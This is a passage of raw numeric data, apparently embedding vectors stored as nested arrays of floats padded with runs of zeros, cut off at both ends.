-0.0561342, 0.0323343, -0.0375461, 0.0185421, 0.0415488, -0.0494538, -0.0481142, 0.0313641, 0.0112539, -0.00920479, -0.0557967, 0.00331631, -0.0122617, -0.0273039, -0.0260745, 0.0349213, -0.000685518, -0.0296436, -0.00940391, -0.0372281, -0.0236736, 0.0114687, -0.0342062, -0.0166429, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.13428, -0.250338, 0.623958, -0.729949, 0.347875, 0.793534, -0.122709, -1.56755, -0.584357, -0.698489, -0.266717, -0.337845, 0.460555, 0.86423, 0.999238, 0.410328, -1.16663, -1.51657, 0.206326, 0.562607, 0.485309, -0.820394, -0.336925, 0.0236041, 0.246445, 0.734784, 0.0765648, -0.587131, 0.0358843, 0.263845, 1.62644, -1.08102, -0.21132, 0.2875, 0.759702, -0.0693274, -0.435554, 
0.722822, -0.168314, -0.39852, -0.123358, -1.34996, 0.0648622, -0.0595177, -0.385708, 0.235199, 0.0230252, 0.137372, 0.709628, 0.0370117, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0987396, -0.301334, -1.24903, -0.00527879, 1.11306, 0.410202, -0.732398, 0.770142, 0.565242, 0.90791, -0.520159, 0.0784915, 1.77222, -0.0930948, -0.434791, -0.271347, 0.842861, 0.378459, -0.185053, 0.940164, -0.368434, 0.428824, -0.939798, 0.564421, -0.354606, 0.245881, 0.0599714, 0.523408, 0.00783036, 0.92352, -1.00592, 1.03324, 0.287522, -0.225465, -0.745112, 0.510052, -0.711423, -0.966533, -0.326624, 1.37277, 0.166693, 1.67628, -0.105982, 0.743245, 0.549448, 0.131662, -0.0185182, -0.58483, -0.0162535, 0.0700885, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.111798, -0.384229, -0.0158996, 0.493751, 0.480073, -0.486706, -0.239616, 0.370729, -0.946915, -0.259901, -0.554722, -0.242543, 0.117089, -0.265586, -0.0225331, 0.0794114, -0.651464, 0.108682, 0.364962, -1.09949, 0.373657, -0.665573, -0.498233, 1.80907, 0.00478645, 0.0234078, 0.0265564, 0.011716, 0.000637847, 0.219931, -0.154491, 0.589365, -0.130138, -0.0491897, -0.630479, 0.234976, 0.641299, 0.1846, 1.39282, -0.856502, -0.284169, -0.784024, 1.2357, -0.253055, 0.109481, 1.34239, 0.0191636, -0.315844, 0.309959, 0.892919, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.361696, -0.155853, 0.357446, 0.0539081, 0.357154, 
-0.333738, 0.191132, 0.988624, 0.0120792, 0.975624, 0.169848, 0.475589, 0.470524, 0.212149, 0.466674, 0.356372, 0.146268, -1.47089, -1.28099, 0.866954, 1.1385, 1.15731, -0.232466, -0.105836, -0.640213, 0.359842, 0.626513, -0.721511, -0.023073, -0.250567, 0.300248, -0.527798, 0.0927905, 0.743142, 0.117781, 0.36634, -0.000262944, -0.959162, -0.0768731, 0.135232, -1.22383, 0.552452, 0.377563, -0.418466, -0.371429, 0.184774, 0.0276081, 0.22172, -0.242397, -0.429049, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.514525, 0.729256, 0.566363, -0.068331, 0.534624, 0.00407463, -0.234775, -0.531789, 0.317295, -0.64761, 0.466008, -0.45097, 1.53966, 0.511095, -0.21549, 0.110444, -0.0404913, 0.569019, -0.491996, -0.544028, -0.0384042, -1.12107, -0.645575, 1.60107, -0.412113, 0.415298, -0.210109, 0.463746, 0.0151899, 0.266624, 0.364622, 0.228394, -0.350788, -0.307127, -0.437094, 0.559687, -0.23262, -1.06045, 0.186825, 0.545562, -0.497559, -0.865114, 1.51154, -0.207088, -0.110948, 0.386485, -0.0383098, 0.51944, 0.296507, 0.313408, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0516356, 0.270851, 0.337394, -0.310922, -0.333552, 0.240163, -1.19217, -0.143668, 0.422523, 0.565454, -0.28792, -1.02371, -0.512708, 0.551776, -0.831587, -0.363269, 1.69815, 2.126, -1.40338, -0.837417, -0.029906, -2.16894, 0.551952, 0.672213, 0.304685, 0.572517, 0.265048, 0.200276, 0.00572581, 0.847064, 0.77713, 1.04569, 0.12396, 0.488076, 0.377977, -0.714093, 0.191592, 1.39399, 0.568423, -0.461299, 0.788451, -0.323824, -1.33839, 0.112985, -1.55039, 0.557742, 0.0203518, 0.0621359, 0.513316, 1.08671, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.525018, -0.0544026, -1.01671, -0.583964, -1.05477, 0.498755, -0.301903, -0.273579, -0.0124779, 1.80194, -0.149194, -0.579677, 0.0611759, -0.523195, -0.812707, 0.0576258, 0.0467645, -0.00180995, -0.283825, 0.221157, 1.29346, 0.47674, -0.109894, -0.0230372, 0.00831431, -0.53638, -0.693933, 0.617845, 0.0370008, 0.051438, -2.31771, 0.420819, 0.592334, 0.596215, -0.0329991, -0.178674, 0.267148, -0.870494, -0.0401763, 0.0978662, -0.840034, -0.127339, -0.0074795, 0.149865, 0.550228, 0.00430642, 0.0366502, 0.0806032, -0.515249, 0.0243668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0444, -0.466823, -0.320242, 0.6829, -0.116566, 0.0969473, 0.189347, -0.423045, 0.167971, 0.201212, 0.0787913, -0.0270053, 1.47947, 0.176775, 0.76833, -0.103811, 0.482491, 0.455804, -0.482848, 0.509984, 0.497933, 1.63258, 0.124691, 2.07697, 0.0209384, 0.392648, -0.415528, -0.281414, 0.0374414, -0.307279, 1.11838, 1.16398, -4.50772, 0.0841608, 0.163104, -0.195651, -0.131116, 0.525142, -0.111291, -0.121802, 0.0648282, 0.237227, 1.98529, -0.0724213, -0.292497, 0.626733, 0.0184495, -0.0786084, -0.18906, 0.0744121, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.837116, -0.451647, -0.227174, -1.89145, 0.697434, 0.597035, -0.91283, -3.63761, 0.296452, 1.27, 0.0133363, -0.317362, -0.256243, 0.639785, 0.756469, 0.285274, 0.485967, -1.4202, 
0.0483243, 0.725402, 2.17914, -1.34179, 0.545126, 0.311659, -0.921769, 0.323842, 1.83966, 0.313664, -0.027313, -0.179077, 2.571, 0.317315, 0.430738, 0.363456, 0.0215819, -0.146503, -0.908032, -0.798715, -0.109191, -0.488424, -0.873893, 0.885527, -0.100551, 0.265515, -0.991745, -0.115295, -0.00277927, 0.887395, 0.208105, 0.160605, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.987425, -0.11875, 0.112092, 0.0154184, -0.373812, 0.0570874, -0.519055, 0.727709, 0.944432, 0.24383, -0.852422, 0.298895, 0.0540951, 0.75339, 0.00644077, 0.0151592, -0.125989, 0.0271444, 1.58999, 0.00545091, -0.0423867, -5.52104, 0.282836, -0.336109, 0.1686, -0.0495667, 1.10847, -2.96101, -0.0113971, -0.281469, 0.0302631, -0.0283551, 1.14307, 0.254046, 0.0916907, -0.0176987, -0.928124, 0.27087, 0.152317, -0.0242254, -0.2972, -0.905688, 0.265359, -0.717016, -0.882268, 0.19797, -0.0490131, 0.12463, -0.242621, 0.198049, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.220779, -1.90471, -0.117091, -1.61355, -1.09943, 0.25002, 0.524479, -0.279029, 0.928462, 0.930619, 0.123065, -0.14276, 0.25306, 1.89695, -0.0161813, -0.215993, -0.165291, 0.0415913, -0.593551, 0.527864, 0.327697, -0.287304, 0.348936, 1.71165, 0.423018, 0.658318, 0.102095, 0.0308208, -0.0148748, -0.146764, 2.03565, -0.216566, 0.008719, -0.0762305, 0.22058, 0.512423, 0.0953863, 1.49071, -0.390167, 0.519073, 0.284427, -0.611205, -1.38521, 0.231062, -2.50482, 1.0336, -0.00303558, 0.233293, 0.193347, 0.209275, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0220463, 0.0553504, -0.0548471, 2.54483, -0.56593, 0.168413, 0.725362, 0.441704, -0.237492, 0.477621, -0.212039, 0.029527, -0.187649, -0.118575, 2.72367, -0.145059, -0.232839, -0.191228, 1.35749, -0.494896, -0.464176, -1.60674, -0.0340444, 0.159353, -0.133211, 0.0332512, 0.669341, -1.36153, -0.0489647, -0.260807, 0.424787, 1.50956, 2.24948, -0.255507, 0.506954, 0.434642, -0.736513, 1.04918, 0.266098, 0.00363076, 0.026298, 0.678124, -0.20829, -0.227042, -0.18946, -0.00145864, -0.0219063, 1.2319, -0.0801564, -0.0762384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.678059, 1.1399, -0.22875, 0.555605, -0.571683, 0.893775, 0.814943, 0.169423, -0.209838, -0.377271, 0.204791, 0.153569, -0.420929, 0.388324, 0.232883, -0.355148, 0.488644, 0.0540576, 0.303034, 0.926561, 0.290213, 0.622966, 0.554027, -0.114579, -0.690312, -0.120495, 0.675638, 0.465693, -0.00285802, -0.05475, 1.55823, -1.94291, 0.184791, -0.4625, -0.264168, -0.186122, -0.211548, 0.133794, -0.197938, -0.285481, -0.43557, -0.559847, -0.0683882, 0.217929, 1.24071, -0.480507, 0.00834116, 0.262503, 0.0511805, -0.394065, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.302832, -0.61937, 0.238654, -0.810509, -0.33906, -0.29936, 0.624312, 0.246324, -0.794042, 0.322352, 0.208332, 0.165682, 0.781704, -0.017636, 0.171101, -0.196268, -0.34468, -0.965811, -0.410092, -1.37901, -0.197653, 1.35369, 0.0517519, 2.39088, 0.145099, 0.00530625, -0.0102088, -0.57524, -0.0246001, 0.551582, 
-3.19226, 0.370856, -0.526842, -0.13315, 0.547295, -0.00531671, -0.6378, 0.0146852, -0.00445634, 1.14827, 0.492917, 0.261022, 0.676864, -0.0254317, -0.663054, 1.26256, 0.000234208, 0.0824745, -0.182618, 1.22212, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.353421, 0.06693, 0.0493675, 1.11491, -0.11735, 0.0129366, -0.595701, 1.25142, 0.0401045, 1.05399, -0.132534, 0.143223, -0.265396, -0.555765, 1.34896, 1.30419, 0.335002, 1.88137, -1.96034, -1.12523, -2.2207, 0.704169, 0.260637, 0.177509, 0.477575, -0.06193, -1.01149, -0.103457, 0.0268643, 0.312808, -3.85086, -0.332733, -0.737561, 0.6836, -0.151069, -0.358002, 0.904066, -0.565119, -0.34653, -0.0970678, 0.463389, -0.324567, -0.195591, -0.0121379, 0.710366, -0.00606038, 0.02502, 0.151435, 0.343557, -0.0257731, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.419705, 0.307169, -0.0684055, -0.285063, 0.752186, -0.297043, -0.639381, 0.620681, 0.241017, 0.949954, -0.175313, 0.391498, 0.102996, -0.714793, -0.146078, 0.204128, 0.694055, 0.837949, -0.00613179, 0.768307, 0.254637, 2.33354, 1.25866, -0.681729, 0.71549, -0.332926, 0.24988, 0.550644, 0.0193044, -0.347419, -1.2856, 0.8295, -0.153006, 0.354459, 1.26299, 0.0470904, -0.337803, 1.59117, 0.84554, 0.574368, 0.314708, 0.285017, -0.168212, -0.34106, 0.390118, 0.317648, -0.017023, 0.292082, -0.229685, 0.280504, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 
[0.604195, -0.250477, 0.176706, -0.485326, 0.518547, 0.420182, 0.764687, -0.501107, 0.000365409, 0.286571, -0.199593, -0.0687697, -0.090422, 0.100321, 1.87315, -0.550087, -0.237736, -0.0451625, 0.0368874, -1.01324, -1.19145, -0.364827, -0.0852119, 0.177982, 0.191533, -0.690354, -0.108199, -1.06864, 0.0438091, 0.0537388, 0.29812, 1.28159, -3.40777, -0.0139586, 0.773688, 0.0906515, 1.23175, 0.310602, -0.421719, -0.364482, 0.164712, 0.959822, 0.16763, -0.315777, 0.0315317, -0.0750104, 0.0424572, -0.0261545, 0.131214, 0.190929, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.631095, -0.136922, 0.192901, 1.83294, -1.31448, 0.363289, -0.703304, 0.194517, 0.0866417, -0.39153, 0.244252, -0.130668, 1.04194, 0.0715847, 0.0447545, -0.011265, -0.0613804, 0.0164184, -0.283611, 0.558953, -1.0236, 1.70124, -0.520204, -0.357118, 0.23171, 0.413674, 0.831299, -0.652587, 0.0123612, 1.01369, -0.0921471, 1.85926, -0.274953, 0.00396854, 0.499007, -0.0583653, -0.542197, -0.508693, 1.44272, -0.149894, 0.0667491, 0.228924, -0.188943, -0.145105, 0.713286, -0.230636, 0.0299255, -0.433946, 0.118381, 1.12851, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.483853, -0.692982, 0.387779, -1.92043, 1.29098, -0.126597, -1.12485, -0.830632, 0.953765, 0.460391, 0.352012, -0.0950456, -0.0743421, -0.512201, -0.717967, 0.364853, 0.589011, 1.08016, -0.323416, -0.969957, -0.334382, -1.96493, -1.15467, 0.938891, 0.641144, -0.429325, -0.517366, -0.212861, 0.0194235, 0.800349, -0.0433732, 0.754006, 0.113681, -0.194989, 0.269262, 0.647329, 0.848724, 0.0227557, -1.17363, 0.835602, -0.541707, -0.0115212, 
-1.2729, -0.099127, -0.712511, 0.309546, 0.0364309, 0.353441, 0.510056, -0.066493, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.16261, 0.0806572, 0.109944, -2.1608, 1.55843, -0.220991, 0.54939, -1.26189, 0.324906, 1.04322, 0.0226836, 0.0212751, 0.535402, 0.94868, -0.291586, -0.887279, 0.586977, 0.993646, 0.314019, -0.728011, -0.0153085, -0.0630331, 0.27053, -0.532896, 1.48371, 0.481589, -1.03356, 0.585105, -0.0192347, -0.0840928, 0.939875, 0.929374, 0.0354388, 0.712848, 0.865863, -0.456905, 0.110715, -0.754562, 0.0300391, -0.255174, 0.758188, 0.0729846, -0.800102, 0.476582, 0.285396, 0.182881, -0.0160676, 0.628726, 0.0887909, 0.417291, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.013818, -2.83876, 0.115447, 1.48861, 0.315034, -0.293435, 0.339216, 0.835236, -0.730367, 0.319519, 0.178446, 0.251807, -0.865353, -0.536422, -0.000729229, 0.226427, -1.24616, 0.678098, 0.445178, 0.2023, 0.307007, 1.54061, 0.0174903, 0.0373027, -1.04215, 0.209201, -0.555062, 0.00669197, -0.0189377, 0.376469, 1.13693, 0.674628, -0.648387, -0.154484, 0.632653, 0.38521, -0.0822036, 1.06651, -0.375359, 0.575826, 0.175674, -0.804813, 0.964043, 0.535563, 0.164744, -1.07992, -0.0224722, 0.196535, 0.0714568, -0.623305, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.928138, -0.00595678, 0.336375, -0.169218, -0.985612, 0.1415, -0.780787, -0.237728, 0.106957, -0.579064, 0.0989813, 
-0.618345, 0.0749403, 0.802177, 1.21517, 1.03999, -0.235491, -1.39204, -0.495839, 0.509667, -0.995234, -1.66584, -0.360576, 0.0352511, 1.34724, -0.103969, 0.0043113, -1.47883, -0.0332519, -0.187471, 1.25882, 0.622869, -0.43553, 0.762699, -0.0678183, 0.445816, -0.237375, -0.672961, -0.174105, -0.304865, 1.56023, 0.23417, -0.331839, 0.249164, -0.496398, -0.0882022, -0.0321028, 1.45215, -2.31595, -0.0793209, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.634067, -0.412231, -3.85573, 0.883424, 0.0598685, -0.672404, -0.983054, -0.0404367, 0.358804, 2.0421, -0.690923, -0.307581, 0.309472, -0.101254, -0.722647, 0.407052, 0.181685, 1.64256, 0.107321, -0.13899, -0.915169, -0.906936, -0.580116, 0.341549, -0.202902, -0.585784, -0.137057, 0.393363, -0.0436475, -0.320947, -0.738847, 0.383385, -0.829556, -0.393829, -0.496141, 0.688188, -0.129879, 0.147726, -0.100137, -2.44239, 0.652694, 0.601216, -0.0534787, -0.678199, -1.01819, 0.00666774, 0.00920475, 0.716198, 0.619922, -0.417474, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.224496, -0.232078, -0.893765, 1.19002, 0.0141502, -0.762578, 0.904532, -0.665731, -0.418342, 1.46862, -0.836438, 0.282222, 0.919507, 0.456595, 0.45466, 0.413528, -0.997622, -0.522531, 0.654409, 0.0382136, -0.314546, 0.170898, 0.0910164, -0.518975, 0.810974, -0.779954, 0.504257, -0.257688, -0.03182, 0.120462, 0.939954, 0.178612, -0.195595, 0.79342, -0.761574, -0.150073, -0.0227754, 1.35044, 0.0408023, -0.28902, 0.577161, -0.63545, -0.0696449, -1.54035, -0.927226, -0.313917, -0.00705289, -0.079193, 0.647927, 0.543759, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.163935, -0.0565751, -0.295327, 1.02969, 0.337056, 0.201611, -0.588762, 0.123321, 0.22475, -0.279728, 0.35704, 0.132568, 1.43816, -0.372129, -0.802506, -0.0410776, -0.0263218, 1.26319, -0.50177, 0.373575, -0.207289, 1.87266, -0.0543133, 2.51486, -0.0880487, 0.226463, -0.159071, 1.07884, -0.0134695, 0.187339, -0.266648, 1.76296, -0.412556, -0.0733093, -0.164695, -0.046113, 0.356709, 0.144846, -0.180595, -0.0451341, 0.255264, 0.0997823, 1.04155, -0.265623, 0.0319825, 2.40253, 0.021422, -0.0420001, 0.05654, 1.06995, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1908, -0.007584, -0.09204, 1.093, 0.3171, -2.373, 0.2347, -0.1373, 0.63, 1.445, -0.117, -0.1344, -0.4495, -0.833, 0.6733, 0.1968, -0.1493, 0.6304, -0.003056, 0.747, -0.02794, 0.805, 0.321, 0.3708, 0.4192, 0.0776, -0.4688, -0.251, -0.00977, 0.596, 2.355, 1.077, -0.6753, -0.1116, -1.053, 0.4868, -0.0539, 0.837, 0.1715, 0.5454, -0.1925, 1.032, 0.1533, -1.154, -0.04285, 0.3127, 0.0443, 0.02869, -0.7974, 0.4727], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 